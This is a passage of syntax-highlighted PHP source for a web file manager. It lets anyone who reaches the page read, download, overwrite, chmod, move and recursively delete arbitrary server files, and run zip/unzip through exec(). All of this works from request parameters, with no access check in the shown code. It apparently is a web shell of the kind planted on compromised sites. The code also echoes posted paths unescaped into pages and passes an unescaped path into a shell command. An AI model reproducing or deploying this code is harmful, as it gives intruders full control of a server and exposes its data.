	<span style="color: #19177C">$binaire_ext_liste</span> <span style="color: #666666">=</span> <span style="color: #008000; font-weight: bold">array</span>(<span style="color: #BA2121">&#39;zip&#39;</span>,<span style="color: #BA2121">&#39;gz&#39;</span>,<span style="color: #BA2121">&#39;doc&#39;</span>,<span style="color: #BA2121">&#39;docx&#39;</span>,<span style="color: #BA2121">&#39;xls&#39;</span>,<span style="color: #BA2121">&#39;xlsx&#39;</span>,<span style="color: #BA2121">&#39;ppt&#39;</span>,<span style="color: #BA2121">&#39;pptx&#39;</span>,<span style="color: #BA2121">&#39;odt&#39;</span>,<span style="color: #BA2121">&#39;ods&#39;</span>,<span style="color: #BA2121">&#39;odp&#39;</span>,<span style="color: #BA2121">&#39;rtf&#39;</span>,<span style="color: #BA2121">&#39;pages&#39;</span>,<span style="color: #BA2121">&#39;numbers&#39;</span>,<span style="color: #BA2121">&#39;key&#39;</span>);
	<span style="color: #008000; font-weight: bold">if</span>(<span style="color: #008000">in_array</span>(<span style="color: #19177C">$ext_fich</span> , <span style="color: #19177C">$media_ext_liste</span>)) { <span style="color: #008000; font-weight: bold">echo</span> <span style="color: #BA2121">&#39;&lt;p&gt;&lt;form method=&quot;POST&quot; action=&quot;?filesrc=&#39;</span><span style="color: #666666">.</span><span style="color: #19177C">$_GET</span>[<span style="color: #BA2121">&#39;filesrc&#39;</span>]<span style="color: #666666">.</span><span style="color: #BA2121">&#39;&amp;path=&#39;</span><span style="color: #666666">.</span><span style="color: #19177C">$path</span><span style="color: #666666">.</span><span style="color: #BA2121">&#39;&amp;telechargefichier=1&quot;&gt;&lt;input class=&quot;milieu&quot; type=&quot;submit&quot; value=&quot;Download the file&quot;&gt;&lt;/form&gt;&lt;/p&gt;&lt;iframe class=&quot;milieu&quot; width=&quot;700&quot; height=&quot;700&quot; src=&quot;&#39;</span> <span style="color: #666666">.</span>cheminWeb(<span style="color: #19177C">$_GET</span>[<span style="color: #BA2121">&#39;filesrc&#39;</span>])<span style="color: #666666">.</span> <span style="color: #BA2121">&#39;&quot;&gt;&lt;/iframe&gt;&#39;</span>; }
	<span style="color: #008000; font-weight: bold">elseif</span>(<span style="color: #008000">in_array</span>(<span style="color: #19177C">$ext_fich</span> , <span style="color: #19177C">$binaire_ext_liste</span>)) { telFichBin(<span style="color: #19177C">$_GET</span>[<span style="color: #BA2121">&#39;filesrc&#39;</span>]); }
	<span style="color: #008000; font-weight: bold">else</span> {<span style="color: #008000; font-weight: bold">echo</span> <span style="color: #BA2121">&#39;&lt;p&gt;&lt;form method=&quot;POST&quot; action=&quot;?filesrc=&#39;</span><span style="color: #666666">.</span><span style="color: #19177C">$_GET</span>[<span style="color: #BA2121">&#39;filesrc&#39;</span>]<span style="color: #666666">.</span><span style="color: #BA2121">&#39;&amp;path=&#39;</span><span style="color: #666666">.</span><span style="color: #19177C">$path</span><span style="color: #666666">.</span><span style="color: #BA2121">&#39;&amp;telechargefichier=1&quot;&gt;&lt;input class=&quot;milieu&quot; type=&quot;submit&quot; value=&quot;Download the file&quot;&gt;&lt;/form&gt;&lt;/p&gt;&lt;pre&gt;&#39;</span> <span style="color: #666666">.</span> <span style="color: #008000">htmlspecialchars</span>(<span style="color: #008000">file_get_contents</span>(<span style="color: #19177C">$_GET</span>[<span style="color: #BA2121">&#39;filesrc&#39;</span>]), <span style="color: #19177C">ENT_QUOTES</span>, <span style="color: #BA2121">&#39;UTF-8&#39;</span>) <span style="color: #666666">.</span> <span style="color: #BA2121">&#39;&lt;/pre&gt;&#39;</span>;}
}
<span style="color: #008000; font-weight: bold">elseif</span> (<span style="color: #008000">isset</span>(<span style="color: #19177C">$_GET</span>[<span style="color: #BA2121">&#39;option&#39;</span>]) <span style="color: #666666">&amp;&amp;</span> (<span style="color: #19177C">$_POST</span>[<span style="color: #BA2121">&#39;opt&#39;</span>] <span style="color: #666666">==</span> <span style="color: #BA2121">&#39;chmod&#39;</span><span style="color: #666666">||</span><span style="color: #19177C">$_POST</span>[<span style="color: #BA2121">&#39;opt&#39;</span>] <span style="color: #666666">==</span> <span style="color: #BA2121">&#39;rename&#39;</span><span style="color: #666666">||</span><span style="color: #19177C">$_POST</span>[<span style="color: #BA2121">&#39;opt&#39;</span>] <span style="color: #666666">==</span> <span style="color: #BA2121">&#39;move&#39;</span><span style="color: #666666">||</span><span style="color: #19177C">$_POST</span>[<span style="color: #BA2121">&#39;opt&#39;</span>] <span style="color: #666666">==</span> <span style="color: #BA2121">&#39;edit&#39;</span>)) {
	<span style="color: #008000; font-weight: bold">echo</span> <span style="color: #BA2121">&#39;&lt;/table&gt;&lt;p class=&quot;centre milieu&quot;&gt;&#39;</span> <span style="color: #666666">.</span> <span style="color: #19177C">$_POST</span>[<span style="color: #BA2121">&#39;path&#39;</span>] <span style="color: #666666">.</span> <span style="color: #BA2121">&#39;&lt;br&gt;&lt;br&gt;&#39;</span>;
	<span style="color: #008000; font-weight: bold">if</span> (<span style="color: #19177C">$_POST</span>[<span style="color: #BA2121">&#39;opt&#39;</span>] <span style="color: #666666">==</span> <span style="color: #BA2121">&#39;chmod&#39;</span>) {
		<span style="color: #008000; font-weight: bold">if</span> (<span style="color: #008000">isset</span>(<span style="color: #19177C">$_POST</span>[<span style="color: #BA2121">&#39;perm&#39;</span>])) {
			<span style="color: #008000; font-weight: bold">if</span> (<span style="color: #008000">chmod</span>(<span style="color: #19177C">$_POST</span>[<span style="color: #BA2121">&#39;path&#39;</span>], intval(<span style="color: #19177C">$_POST</span>[<span style="color: #BA2121">&#39;perm&#39;</span>],<span style="color: #BA2121">8</span>))) {
				<span style="color: #008000; font-weight: bold">echo</span> <span style="color: #BA2121">&#39;&lt;font color=&quot;green&quot;&gt;Change permission successful!&lt;/font&gt;&lt;br&gt;&#39;</span>;
			}
			<span style="color: #008000; font-weight: bold">else</span> {
				<span style="color: #008000; font-weight: bold">echo</span> <span style="color: #BA2121">&#39;&lt;font color=&quot;crimson&quot;&gt;&lt;strong&gt;Change permission failed!&lt;/strong&gt;&lt;/font&gt;&lt;br&gt;&#39;</span>;
			}
		}
		<span style="color: #008000; font-weight: bold">echo</span> <span style="color: #BA2121">&#39;&lt;form class=&quot;centre milieu&quot; method=&quot;POST&quot;&gt;</span>
<span style="color: #BA2121">Permission : &lt;input name=&quot;perm&quot; type=&quot;text&quot; size=&quot;4&quot; value=&quot;&#39;</span> <span style="color: #666666">.</span> substr(<span style="color: #008000">sprintf</span>(<span style="color: #BA2121">&#39;%o&#39;</span>, <span style="color: #008000">fileperms</span>(<span style="color: #19177C">$_POST</span>[<span style="color: #BA2121">&#39;path&#39;</span>])) , <span style="color: #666666">-4</span>) <span style="color: #666666">.</span> <span style="color: #BA2121">&#39;&quot;&gt;</span>
<span style="color: #BA2121">&lt;input type=&quot;hidden&quot; name=&quot;path&quot; value=&quot;&#39;</span> <span style="color: #666666">.</span> <span style="color: #19177C">$_POST</span>[<span style="color: #BA2121">&#39;path&#39;</span>] <span style="color: #666666">.</span> <span style="color: #BA2121">&#39;&quot;&gt;</span>
<span style="color: #BA2121">&lt;input type=&quot;hidden&quot; name=&quot;opt&quot; value=&quot;chmod&quot;&gt;</span>
<span style="color: #BA2121">&lt;input type=&quot;submit&quot; value=&quot;Save&quot;&gt;</span>
<span style="color: #BA2121">&lt;/form&gt;</span>
<span style="color: #BA2121">&lt;p class=&quot;centre&quot;&gt;WARNING, octal notation, enter the 4 digits as follows 0644 or 0705.&lt;/p&gt;&#39;</span>;
	}
	<span style="color: #008000; font-weight: bold">elseif</span> (<span style="color: #19177C">$_POST</span>[<span style="color: #BA2121">&#39;opt&#39;</span>] <span style="color: #666666">==</span> <span style="color: #BA2121">&#39;rename&#39;</span>) {
		<span style="color: #008000; font-weight: bold">if</span> (<span style="color: #008000">isset</span>(<span style="color: #19177C">$_POST</span>[<span style="color: #BA2121">&#39;newname&#39;</span>])) {
			<span style="color: #008000; font-weight: bold">if</span> (<span style="color: #008000">rename</span>(<span style="color: #19177C">$_POST</span>[<span style="color: #BA2121">&#39;path&#39;</span>], <span style="color: #19177C">$path</span> <span style="color: #666666">.</span> <span style="color: #BA2121">&#39;/&#39;</span> <span style="color: #666666">.</span> <span style="color: #19177C">$_POST</span>[<span style="color: #BA2121">&#39;newname&#39;</span>])) {
				<span style="color: #008000; font-weight: bold">echo</span> <span style="color: #BA2121">&#39;&lt;font color=&quot;green&quot;&gt;Name change succeeded!&lt;/font&gt;&lt;br&gt;&#39;</span>;
			}
			<span style="color: #008000; font-weight: bold">else</span> {
				<span style="color: #008000; font-weight: bold">echo</span> <span style="color: #BA2121">&#39;&lt;font color=&quot;crimson&quot;&gt;&lt;strong&gt;Name change failed!&lt;/strong&gt;&lt;/font&gt;&lt;br&gt;&#39;</span>;
			}
			<span style="color: #19177C">$_POST</span>[<span style="color: #BA2121">&#39;name&#39;</span>] <span style="color: #666666">=</span> <span style="color: #19177C">$_POST</span>[<span style="color: #BA2121">&#39;newname&#39;</span>];
		}
		<span style="color: #008000; font-weight: bold">echo</span> <span style="color: #BA2121">&#39;&lt;form class=&quot;centre milieu&quot; method=&quot;POST&quot;&gt;</span>
<span style="color: #BA2121">New name : &lt;input name=&quot;newname&quot; type=&quot;text&quot; size=&quot;30&quot; value=&quot;&#39;</span> <span style="color: #666666">.</span> <span style="color: #19177C">$_POST</span>[<span style="color: #BA2121">&#39;name&#39;</span>] <span style="color: #666666">.</span> <span style="color: #BA2121">&#39;&quot;&gt;</span>
<span style="color: #BA2121">&lt;input type=&quot;hidden&quot; name=&quot;path&quot; value=&quot;&#39;</span> <span style="color: #666666">.</span> <span style="color: #19177C">$_POST</span>[<span style="color: #BA2121">&#39;path&#39;</span>] <span style="color: #666666">.</span> <span style="color: #BA2121">&#39;&quot;&gt;</span>
<span style="color: #BA2121">&lt;input type=&quot;hidden&quot; name=&quot;opt&quot; value=&quot;rename&quot;&gt;</span>
<span style="color: #BA2121">&lt;input type=&quot;submit&quot; value=&quot;Save&quot;&gt;</span>
<span style="color: #BA2121">&lt;/form&gt;&#39;</span>;
	}
	<span style="color: #008000; font-weight: bold">elseif</span> (<span style="color: #19177C">$_POST</span>[<span style="color: #BA2121">&#39;opt&#39;</span>] <span style="color: #666666">==</span> <span style="color: #BA2121">&#39;move&#39;</span>) {
		<span style="color: #008000; font-weight: bold">if</span> (<span style="color: #008000">isset</span>(<span style="color: #19177C">$_POST</span>[<span style="color: #BA2121">&#39;deplace&#39;</span>])) {
			<span style="color: #008000; font-weight: bold">if</span> (<span style="color: #008000">rename</span>(<span style="color: #19177C">$_POST</span>[<span style="color: #BA2121">&#39;path&#39;</span>], <span style="color: #19177C">$_POST</span>[<span style="color: #BA2121">&#39;deplace&#39;</span>])) {
				<span style="color: #008000; font-weight: bold">echo</span> <span style="color: #BA2121">&#39;&lt;font color=&quot;green&quot;&gt;Moving the file successful!&lt;/font&gt;&lt;br&gt;&#39;</span>;
			}
			<span style="color: #008000; font-weight: bold">else</span> {
				<span style="color: #008000; font-weight: bold">echo</span> <span style="color: #BA2121">&#39;&lt;font color=&quot;crimson&quot;&gt;&lt;strong&gt;Moving the file failed!&lt;/strong&gt;&lt;/font&gt;&lt;br&gt;&#39;</span>;
			}
			<span style="color: #19177C">$_POST</span>[<span style="color: #BA2121">&#39;path&#39;</span>] <span style="color: #666666">=</span> <span style="color: #19177C">$_POST</span>[<span style="color: #BA2121">&#39;deplace&#39;</span>];
		}
		<span style="color: #008000; font-weight: bold">echo</span> <span style="color: #BA2121">&#39;&lt;form class=&quot;centre milieu&quot; method=&quot;POST&quot;&gt;</span>
<span style="color: #BA2121">Move the file to : &lt;input name=&quot;deplace&quot; type=&quot;text&quot; size=&quot;30&quot; value=&quot;&#39;</span> <span style="color: #666666">.</span> <span style="color: #19177C">$path</span> <span style="color: #666666">.</span> <span style="color: #BA2121">&#39;/&#39;</span> <span style="color: #666666">.</span> <span style="color: #19177C">$_POST</span>[<span style="color: #BA2121">&#39;name&#39;</span>] <span style="color: #666666">.</span> <span style="color: #BA2121">&#39;&quot;&gt;</span>
<span style="color: #BA2121">&lt;input type=&quot;hidden&quot; name=&quot;path&quot; value=&quot;&#39;</span> <span style="color: #666666">.</span> <span style="color: #19177C">$_POST</span>[<span style="color: #BA2121">&#39;path&#39;</span>] <span style="color: #666666">.</span> <span style="color: #BA2121">&#39;&quot;&gt;</span>
<span style="color: #BA2121">&lt;input type=&quot;hidden&quot; name=&quot;opt&quot; value=&quot;move&quot;&gt;</span>
<span style="color: #BA2121">&lt;input type=&quot;submit&quot; value=&quot;Save&quot;&gt;</span>
<span style="color: #BA2121">&lt;/form&gt;</span>
<span style="color: #BA2121">&lt;p class=&quot;centre&quot;&gt;WARNING, put the absolute path with the file or folder name.&lt;/p&gt;&#39;</span>;
	}
	<span style="color: #008000; font-weight: bold">elseif</span> (<span style="color: #19177C">$_POST</span>[<span style="color: #BA2121">&#39;opt&#39;</span>] <span style="color: #666666">==</span> <span style="color: #BA2121">&#39;edit&#39;</span>) {
		<span style="color: #008000; font-weight: bold">if</span> (<span style="color: #008000">isset</span>(<span style="color: #19177C">$_POST</span>[<span style="color: #BA2121">&#39;src&#39;</span>])) {
			<span style="color: #19177C">$fp</span> <span style="color: #666666">=</span> <span style="color: #008000">fopen</span>(<span style="color: #19177C">$_POST</span>[<span style="color: #BA2121">&#39;path&#39;</span>], <span style="color: #BA2121">&#39;w&#39;</span>);
			<span style="color: #008000; font-weight: bold">if</span> (<span style="color: #008000">fwrite</span>(<span style="color: #19177C">$fp</span>, <span style="color: #19177C">$_POST</span>[<span style="color: #BA2121">&#39;src&#39;</span>])) {
				<span style="color: #008000; font-weight: bold">echo</span> <span style="color: #BA2121">&#39;&lt;font color=&quot;green&quot;&gt;Editing successful!&lt;/font&gt;&lt;br&gt;&#39;</span>;
			}
			<span style="color: #008000; font-weight: bold">else</span> {
				<span style="color: #008000; font-weight: bold">echo</span> <span style="color: #BA2121">&#39;&lt;font color=&quot;crimson&quot;&gt;&lt;strong&gt;Editing failed!&lt;/strong&gt;&lt;/font&gt;&lt;br&gt;&#39;</span>;
			}
			<span style="color: #008000">fclose</span>(<span style="color: #19177C">$fp</span>);
		}
		<span style="color: #008000; font-weight: bold">echo</span> <span style="color: #BA2121">&#39;&lt;form class=&quot;centre milieu&quot; method=&quot;POST&quot;&gt;</span>
<span style="color: #BA2121">&lt;textarea cols=80 rows=20 name=&quot;src&quot;&gt;&#39;</span> <span style="color: #666666">.</span> <span style="color: #008000">htmlspecialchars</span>(<span style="color: #008000">file_get_contents</span>(<span style="color: #19177C">$_POST</span>[<span style="color: #BA2121">&#39;path&#39;</span>]), <span style="color: #19177C">ENT_QUOTES</span>, <span style="color: #BA2121">&#39;UTF-8&#39;</span>) <span style="color: #666666">.</span> <span style="color: #BA2121">&#39;&lt;/textarea&gt;&lt;br&gt;</span>
<span style="color: #BA2121">&lt;input type=&quot;hidden&quot; name=&quot;path&quot; value=&quot;&#39;</span> <span style="color: #666666">.</span> <span style="color: #19177C">$_POST</span>[<span style="color: #BA2121">&#39;path&#39;</span>] <span style="color: #666666">.</span> <span style="color: #BA2121">&#39;&quot;&gt;</span>
<span style="color: #BA2121">&lt;input type=&quot;hidden&quot; name=&quot;opt&quot; value=&quot;edit&quot;&gt;</span>
<span style="color: #BA2121">&lt;input type=&quot;submit&quot; value=&quot;Save&quot;&gt;</span>
<span style="color: #BA2121">&lt;/form&gt;&#39;</span>;
	}
	<span style="color: #008000; font-weight: bold">echo</span> <span style="color: #BA2121">&#39;&lt;/p&gt;&#39;</span>;
}
<span style="color: #008000; font-weight: bold">else</span> {
	<span style="color: #008000; font-weight: bold">echo</span> <span style="color: #BA2121">&#39;&lt;/table&gt;&lt;br&gt;&lt;p class=&quot;milieu centre&quot;&gt;&#39;</span>;
	<span style="color: #008000; font-weight: bold">if</span> (<span style="color: #008000">isset</span>(<span style="color: #19177C">$_GET</span>[<span style="color: #BA2121">&#39;option&#39;</span>]) <span style="color: #666666">&amp;&amp;</span> <span style="color: #19177C">$_POST</span>[<span style="color: #BA2121">&#39;opt&#39;</span>] <span style="color: #666666">==</span> <span style="color: #BA2121">&#39;delete&#39;</span>) {
		<span style="color: #008000; font-weight: bold">if</span> (<span style="color: #19177C">$_POST</span>[<span style="color: #BA2121">&#39;type&#39;</span>] <span style="color: #666666">==</span> <span style="color: #BA2121">&#39;dir&#39;</span>) {
			<span style="color: #008000; font-weight: bold">foreach</span> (<span style="color: #008000; font-weight: bold">new</span> RecursiveIteratorIterator(<span style="color: #008000; font-weight: bold">new</span> RecursiveDirectoryIterator(<span style="color: #19177C">$_POST</span>[<span style="color: #BA2121">&#39;path&#39;</span>], 
				FilesystemIterator<span style="color: #666666">::</span><span style="color: #7D9029">SKIP_DOTS</span> <span style="color: #666666">|</span> FilesystemIterator<span style="color: #666666">::</span><span style="color: #7D9029">UNIX_PATHS</span>), 
				RecursiveIteratorIterator<span style="color: #666666">::</span><span style="color: #7D9029">CHILD_FIRST</span>) <span style="color: #008000; font-weight: bold">as</span> <span style="color: #19177C">$value</span>) {
				<span style="color: #19177C">$value</span><span style="color: #666666">-&gt;</span><span style="color: #7D9029">isFile</span>() <span style="color: #666666">?</span> <span style="color: #008000">unlink</span>(<span style="color: #19177C">$value</span>) <span style="color: #666666">:</span> <span style="color: #008000">rmdir</span>(<span style="color: #19177C">$value</span>);
			}
			<span style="color: #008000; font-weight: bold">if</span> (<span style="color: #008000">rmdir</span>(<span style="color: #19177C">$_POST</span>[<span style="color: #BA2121">&#39;path&#39;</span>])) {
				<span style="color: #008000; font-weight: bold">echo</span> <span style="color: #BA2121">&#39;&lt;font color=&quot;green&quot;&gt;Delete successful!&lt;/font&gt;&lt;br&gt;&#39;</span>;
			}
			<span style="color: #008000; font-weight: bold">else</span> {
				<span style="color: #008000; font-weight: bold">echo</span> <span style="color: #BA2121">&#39;&lt;font color=&quot;crimson&quot;&gt;&lt;strong&gt;Delete failed!&lt;/strong&gt;&lt;/font&gt;&lt;br&gt;&#39;</span>;
			}
		}
		<span style="color: #008000; font-weight: bold">elseif</span> (<span style="color: #19177C">$_POST</span>[<span style="color: #BA2121">&#39;type&#39;</span>] <span style="color: #666666">==</span> <span style="color: #BA2121">&#39;file&#39;</span>) {
			<span style="color: #008000; font-weight: bold">if</span> (<span style="color: #008000">unlink</span>(<span style="color: #19177C">$_POST</span>[<span style="color: #BA2121">&#39;path&#39;</span>])) {
				<span style="color: #008000; font-weight: bold">echo</span> <span style="color: #BA2121">&#39;&lt;font color=&quot;green&quot;&gt;Delete file successful!&lt;/font&gt;&lt;br&gt;&#39;</span>;
			}
			<span style="color: #008000; font-weight: bold">else</span> {
				<span style="color: #008000; font-weight: bold">echo</span> <span style="color: #BA2121">&#39;&lt;font color=&quot;crimson&quot;&gt;&lt;strong&gt;Delete file failed!&lt;/strong&gt;&lt;/font&gt;&lt;br&gt;&#39;</span>;
			}
		}
	}
	<span style="color: #008000; font-weight: bold">elseif</span> (<span style="color: #008000">isset</span>(<span style="color: #19177C">$_GET</span>[<span style="color: #BA2121">&#39;option&#39;</span>]) <span style="color: #666666">&amp;&amp;</span> <span style="color: #19177C">$_POST</span>[<span style="color: #BA2121">&#39;opt&#39;</span>] <span style="color: #666666">==</span> <span style="color: #BA2121">&#39;zip&#39;</span>) {
		<span style="color: #19177C">$ficCompress</span> <span style="color: #666666">=</span> <span style="color: #008000">escapeshellcmd</span>(<span style="color: #19177C">$_POST</span>[<span style="color: #BA2121">&#39;path&#39;</span>]);
		<span style="color: #008000">exec</span>(<span style="color: #BA2121">&quot;zip -qr -6 &quot;</span><span style="color: #666666">.</span><span style="color: #19177C">$ficCompress</span><span style="color: #666666">.</span><span style="color: #BA2121">&quot;.zip &quot;</span><span style="color: #666666">.</span><span style="color: #19177C">$ficCompress</span><span style="color: #666666">.</span><span style="color: #BA2121">&quot;&quot;</span>);
		<span style="color: #008000; font-weight: bold">echo</span> <span style="color: #BA2121">&#39;&lt;font color=&quot;green&quot;&gt;Compression successful!&lt;/font&gt;&lt;br&gt;&#39;</span>;
		}
	<span style="color: #008000; font-weight: bold">elseif</span> (<span style="color: #008000">isset</span>(<span style="color: #19177C">$_GET</span>[<span style="color: #BA2121">&#39;option&#39;</span>]) <span style="color: #666666">&amp;&amp;</span> <span style="color: #19177C">$_POST</span>[<span style="color: #BA2121">&#39;opt&#39;</span>] <span style="color: #666666">==</span> <span style="color: #BA2121">&#39;unzip&#39;</span>) {
		<span style="color: #19177C">$extFic</span> <span style="color: #666666">=</span> <span style="color: #008000; font-weight: bold">new</span> SplFileInfo(<span style="color: #19177C">$_POST</span>[<span style="color: #BA2121">&#39;path&#39;</span>]);
		<span style="color: #008000; font-weight: bold">if</span> (<span style="color: #19177C">$extFic</span><span style="color: #666666">-&gt;</span><span style="color: #7D9029">getExtension</span>() <span style="color: #666666">==</span> <span style="color: #BA2121">&#39;zip&#39;</span>) {
			<span style="color: #19177C">$ficCompress</span> <span style="color: #666666">=</span> <span style="color: #008000">escapeshellcmd</span>(<span style="color: #19177C">$_POST</span>[<span style="color: #BA2121">&#39;path&#39;</span>]);
			<span style="color: #008000">exec</span>(<span style="color: #BA2121">&quot;unzip -q &quot;</span><span style="color: #666666">.</span><span style="color: #19177C">$ficCompress</span><span style="color: #666666">.</span><span style="color: #BA2121">&quot; -d &quot;</span><span style="color: #666666">.</span><span style="color: #19177C">$path</span><span style="color: #666666">.</span><span style="color: #BA2121">&quot;&quot;</span>);
			<span style="color: #008000; font-weight: bold">echo</span> <span style="color: #BA2121">&#39;&lt;font color=&quot;green&quot;&gt;Uncompression successful!&lt;/font&gt;&lt;br&gt;&#39;</span>;
			}
		<span style="color: #008000; font-weight: bold">else</span> {
			<span style="color: #008000; font-weight: bold">echo</span> <span style="color: #BA2121">&#39;&lt;font color=&quot;crimson&quot;&gt;&lt;strong&gt;Uncompression failed! You need a ZIP file&lt;/strong&gt;&lt;/font&gt;&lt;br&gt;&#39;</span>;
			}
		} 
	<span style="color: #008000; font-weight: bold">echo</span> <span style="color: #BA2121">&#39;&lt;/p&gt;&#39;</span>;
	<span style="color: #19177C">$scandir</span> <span style="color: #666666">=</span> <span style="color: #008000">scandir</span>(<span style="color: #19177C">$path</span>);
	<span style="color: #008000; font-weight: bold">echo</span> <span style="color: #BA2121">&#39;&lt;div id=&quot;content&quot;&gt;&lt;table width=&quot;700&quot; border=&quot;0&quot; cellpadding=&quot;3&quot; cellspacing=&quot;1&quot; align=&quot;center&quot;&gt;</span>
<span style="color: #BA2121">&lt;tr class=&quot;first&quot;&gt;</span>
<span style="color: #BA2121">&lt;td class=&quot;centre&quot;&gt;Name&lt;/td&gt;</span>
<span style="color: #BA2121">&lt;td class=&quot;centre&quot;&gt;Size&lt;/td&gt;</span>
<span style="color: #BA2121">&lt;td class=&quot;centre&quot;&gt;Permissions&lt;/td&gt;</span>
<span style="color: #BA2121">&lt;td class=&quot;centre&quot;&gt;Actions&lt;/td&gt;</span>
<span style="color: #BA2121">&lt;/tr&gt;&#39;</span>;

	<span style="color: #008000; font-weight: bold">foreach</span> (<span style="color: #19177C">$scandir</span> <span style="color: #008000; font-weight: bold">as</span> <span style="color: #19177C">$dir</span>) {
		<span style="color: #008000; font-weight: bold">if</span> (<span style="color: #666666">!</span><span style="color: #008000">is_dir</span>(<span style="color: #BA2121">&quot;</span><span style="color: #BB6688; font-weight: bold">$path</span><span style="color: #BA2121">/</span><span style="color: #BB6688; font-weight: bold">$dir</span><span style="color: #BA2121">&quot;</span>) <span style="color: #666666">||</span> <span style="color: #19177C">$dir</span> <span style="color: #666666">==</span> <span style="color: #BA2121">&#39;.&#39;</span> <span style="color: #666666">||</span> <span style="color: #19177C">$dir</span> <span style="color: #666666">==</span> <span style="color: #BA2121">&#39;..&#39;</span>) <span style="color: #008000; font-weight: bold">continue</span>;
		<span style="color: #008000; font-weight: bold">echo</span> <span style="color: #BA2121">&quot;&lt;tr&gt;</span>
<span style="color: #BA2121">&lt;td&gt;&lt;a href=</span><span style="color: #BB6622; font-weight: bold">\&quot;</span><span style="color: #BA2121">?path=</span><span style="color: #BB6688; font-weight: bold">$path</span><span style="color: #BA2121">/</span><span style="color: #BB6688; font-weight: bold">$dir</span><span style="color: #BB6622; font-weight: bold">\&quot;</span><span style="color: #BA2121">&gt;</span><span style="color: #BB6688; font-weight: bold">$dir</span><span style="color: #BA2121">&lt;/a&gt;&lt;/td&gt;</span>
<span style="color: #BA2121">&lt;td class=</span><span style="color: #BB6622; font-weight: bold">\&quot;</span><span style="color: #BA2121">petit centre</span><span style="color: #BB6622; font-weight: bold">\&quot;</span><span style="color: #BA2121">&gt;--&lt;/td&gt;</span>
<span style="color: #BA2121">&lt;td class=</span><span style="color: #BB6622; font-weight: bold">\&quot;</span><span style="color: #BA2121">petit centre</span><span style="color: #BB6622; font-weight: bold">\&quot;</span><span style="color: #BA2121">&gt;&quot;</span>;
		<span style="color: #008000; font-weight: bold">if</span> (<span style="color: #008000">is_writable</span>(<span style="color: #BA2121">&quot;</span><span style="color: #BB6688; font-weight: bold">$path</span><span style="color: #BA2121">/</span><span style="color: #BB6688; font-weight: bold">$dir</span><span style="color: #BA2121">&quot;</span>)) <span style="color: #008000; font-weight: bold">echo</span> <span style="color: #BA2121">&#39;&lt;font color=&quot;green&quot;&gt;&#39;</span>;
		<span style="color: #008000; font-weight: bold">elseif</span> (<span style="color: #666666">!</span><span style="color: #008000">is_readable</span>(<span style="color: #BA2121">&quot;</span><span style="color: #BB6688; font-weight: bold">$path</span><span style="color: #BA2121">/</span><span style="color: #BB6688; font-weight: bold">$dir</span><span style="color: #BA2121">&quot;</span>)) <span style="color: #008000; font-weight: bold">echo</span> <span style="color: #BA2121">&#39;&lt;font color=&quot;crimson&quot;&gt;&#39;</span>;
		<span style="color: #008000; font-weight: bold">echo</span> perms(<span style="color: #BA2121">&quot;</span><span style="color: #BB6688; font-weight: bold">$path</span><span style="color: #BA2121">/</span><span style="color: #BB6688; font-weight: bold">$dir</span><span style="color: #BA2121">&quot;</span>);
		<span style="color: #008000; font-weight: bold">if</span> (<span style="color: #008000">is_writable</span>(<span style="color: #BA2121">&quot;</span><span style="color: #BB6688; font-weight: bold">$path</span><span style="color: #BA2121">/</span><span style="color: #BB6688; font-weight: bold">$dir</span><span style="color: #BA2121">&quot;</span>) <span style="color: #666666">||</span> <span style="color: #666666">!</span><span style="color: #008000">is_readable</span>(<span style="color: #BA2121">&quot;</span><span style="color: #BB6688; font-weight: bold">$path</span><span style="color: #BA2121">/</span><span style="color: #BB6688; font-weight: bold">$dir</span><span style="color: #BA2121">&quot;</span>)) <span style="color: #008000; font-weight: bold">echo</span> <span style="color: #BA2121">&#39;&lt;/font&gt;&#39;</span>;

		<span style="color: #008000; font-weight: bold">echo</span> <span style="color: #BA2121">&quot;&lt;/td&gt;</span>
<span style="color: #BA2121">&lt;td class=</span><span style="color: #BB6622; font-weight: bold">\&quot;</span><span style="color: #BA2121">centre</span><span style="color: #BB6622; font-weight: bold">\&quot;</span><span style="color: #BA2121">&gt;&lt;form method=</span><span style="color: #BB6622; font-weight: bold">\&quot;</span><span style="color: #BA2121">POST</span><span style="color: #BB6622; font-weight: bold">\&quot;</span><span style="color: #BA2121"> action=</span><span style="color: #BB6622; font-weight: bold">\&quot;</span><span style="color: #BA2121">?option&amp;path=</span><span style="color: #BB6688; font-weight: bold">$path</span><span style="color: #BB6622; font-weight: bold">\&quot;</span><span style="color: #BA2121">&gt;</span>
<span style="color: #BA2121">&lt;select name=</span><span style="color: #BB6622; font-weight: bold">\&quot;</span><span style="color: #BA2121">opt</span><span style="color: #BB6622; font-weight: bold">\&quot;</span><span style="color: #BA2121">&gt;</span>
<span style="color: #BA2121">&lt;option value=</span><span style="color: #BB6622; font-weight: bold">\&quot;</span><span style="color: #BA2121">What to do?</span><span style="color: #BB6622; font-weight: bold">\&quot;</span><span style="color: #BA2121">&gt;What to do?&lt;/option&gt;</span>
<span style="color: #BA2121">&lt;option value=</span><span style="color: #BB6622; font-weight: bold">\&quot;</span><span style="color: #BA2121">rename</span><span style="color: #BB6622; font-weight: bold">\&quot;</span><span style="color: #BA2121">&gt;Rename&lt;/option&gt;</span>
<span style="color: #BA2121">&lt;option value=</span><span style="color: #BB6622; font-weight: bold">\&quot;</span><span style="color: #BA2121">move</span><span style="color: #BB6622; font-weight: bold">\&quot;</span><span style="color: #BA2121">&gt;Move&lt;/option&gt;</span>
<span style="color: #BA2121">&lt;option value=</span><span style="color: #BB6622; font-weight: bold">\&quot;</span><span style="color: #BA2121">chmod</span><span style="color: #BB6622; font-weight: bold">\&quot;</span><span style="color: #BA2121">&gt;Chmod&lt;/option&gt;</span>
<span style="color: #BA2121">&lt;option value=</span><span style="color: #BB6622; font-weight: bold">\&quot;</span><span style="color: #BA2121">zip</span><span style="color: #BB6622; font-weight: bold">\&quot;</span><span style="color: #BA2121">&gt;Compress&lt;/option&gt;</span>
<span style="color: #BA2121">&lt;option value=</span><span style="color: #BB6622; font-weight: bold">\&quot;</span><span style="color: #BA2121">unzip</span><span style="color: #BB6622; font-weight: bold">\&quot;</span><span style="color: #BA2121">&gt;Uncompress&lt;/option&gt;</span>
<span style="color: #BA2121">&lt;option value=</span><span style="color: #BB6622; font-weight: bold">\&quot;</span><span style="color: #BA2121">delete</span><span style="color: #BB6622; font-weight: bold">\&quot;</span><span style="color: #BA2121">&gt;Delete&lt;/option&gt;</span>
<span style="color: #BA2121">&lt;/select&gt;</span>
